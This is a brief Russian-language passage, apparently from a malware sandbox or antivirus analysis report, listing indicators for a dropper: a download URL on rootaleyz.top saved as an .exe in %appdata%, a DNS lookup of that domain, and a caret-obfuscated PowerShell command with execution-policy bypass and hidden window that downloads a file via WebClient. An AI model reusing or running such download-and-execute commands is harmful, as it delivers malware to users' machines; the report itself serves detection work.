Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^w^ErS^heLl.^eXE^ -e^x^e^CUTio^npO^LiCY^ by^p^aS^s ^-NoPRoF^ILE -^W^I^N^Do^W^sTyL^e ^H^I^D^De^n^ (^nE^w-oBJECT SYS^t^e^m^.net^.WE^BC^Li^e^NT^)^.^d^owN^lOaD^fI^l^e(^'htt...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /c "P^o^w^ErS^heLl.^eXE^ -e^x^e^CUTio^npO^LiCY^ by^p^aS^s ^-NoPRoF^ILE -^W^I^N^Do^W^sTyL^e ^H^I^D^De^n^ (^nE^w-oBJECT SYS^t^e^m^.net^.WE^BC^Li^e^NT^)^.^d^owN^lOaD^fI^l^e(^'htt...' (со скрытым окном)